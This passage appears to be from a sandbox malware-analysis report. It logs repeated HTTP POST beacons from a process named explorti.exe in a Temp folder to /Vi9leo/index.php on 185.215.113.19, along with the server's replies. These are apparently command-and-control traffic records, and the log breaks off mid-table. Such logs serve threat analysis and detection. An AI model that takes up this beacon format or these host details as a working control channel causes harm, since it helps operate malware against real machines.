Sep 1, 2024 06:28:55.577899933 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:56.332283020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:56.333025932 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:56.580786943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49794	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:56.689177036 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:57.602642059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:57.605370045 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:57.853410006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49795	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:57.964653015 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:58.705352068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:58.706005096 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:58.954835892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49796	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:59.070533037 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:59.811717033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:59.812423944 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:00.060286999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49797	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:00.174998999 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:00.930145025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:00.930807114 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:01.178709030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49798	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:01.464948893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:02.216058969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:02.218700886 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:02.466948032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49799	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:02.582798004 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:03.435682058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:03.436379910 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:03.683669090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49800	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:03.863631964 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:04.637744904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49801	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:04.646326065 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:05.403428078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49802	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:05.524626970 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:06.285371065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:06.331943035 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:06.581348896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49803	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:06.692475080 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:07.457123995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49804	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:07.466005087 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:08.214533091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49805	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:08.337153912 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:09.078937054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49806	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:09.090022087 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:09.844129086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49807	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:09.957959890 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:10.718096018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49808	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:10.861005068 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:11.606689930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49809	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:11.725161076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:12.465786934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
